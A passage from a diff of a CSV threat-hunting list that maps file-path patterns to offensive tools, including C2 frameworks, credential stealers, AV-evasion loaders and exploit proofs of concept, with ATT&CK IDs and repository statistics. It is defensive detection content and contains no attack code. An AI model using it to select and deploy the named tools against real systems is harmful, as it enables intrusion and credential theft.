aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/C2-Tool-Collection/*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*/cain.html*","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","8","743","233","2023-09-28T15:38:54Z","2021-05-11T12:38:17Z" +"*/cain.html*","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","8","745","233","2023-09-28T15:38:54Z","2021-05-11T12:38:17Z" "*/campaign/*/implant/get_all*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*/canary.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/canary.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/CandyPotato.cpp*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.sdf*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.sln*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.vcxproj*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" -"*/CapBypass.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/CapBypass.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*/carlosevieira/Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*/cassandra-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cassandra-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cc2_frp.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/cccam-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/cerbrutus*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","290","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" -"*/Certipy.git*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"*/Certipy/*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*/cerbrutus*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*/Certipy.git*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*/Certipy/*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "*/CertStealer*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" -"*/certsync.git*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" -"*/cfn__resource_injection_lambda*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/certsync.git*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*/cfn__resource_injection_lambda*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/ChainBuilder.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"*/charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*/charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*/charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*/charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*/CheckPort.exe*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*/CheeseTools.git*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"*/Chimera.git*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*/Chimera.git*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*/chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*/chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*/chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel.git*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel@latest*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-darwin_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-freebsd*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-linux_*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*/chisel-windows_amd6*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/Chimera.git*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/Chimera.git*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*/chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*/chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel.git*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel@latest*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-darwin_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-freebsd*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-linux_*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*/chisel-windows_amd6*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*/chrisk44/*","offensive_tool_keyword","Github Username","Github username known for network exploitation tools","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","1","N/A","N/A","10","2213","435","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" -"*/chrome_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/chrome_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*/ChromeDump/*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*/chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*/cics-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3056,8 +3062,8 @@ "*/citrix-enum-servers-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/clamav-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/clickme.docx*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" -"*/client/beef.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/client/bof/*.asm*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*/client/beef.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/client/bof/*.asm*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" "*/Client/Commands/Enumeration.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Execution.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Injection.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" @@ -3067,30 +3073,30 @@ "*/Client/Pages/Drones.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Pages/Payloads.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Pages/Pivots.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*/clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 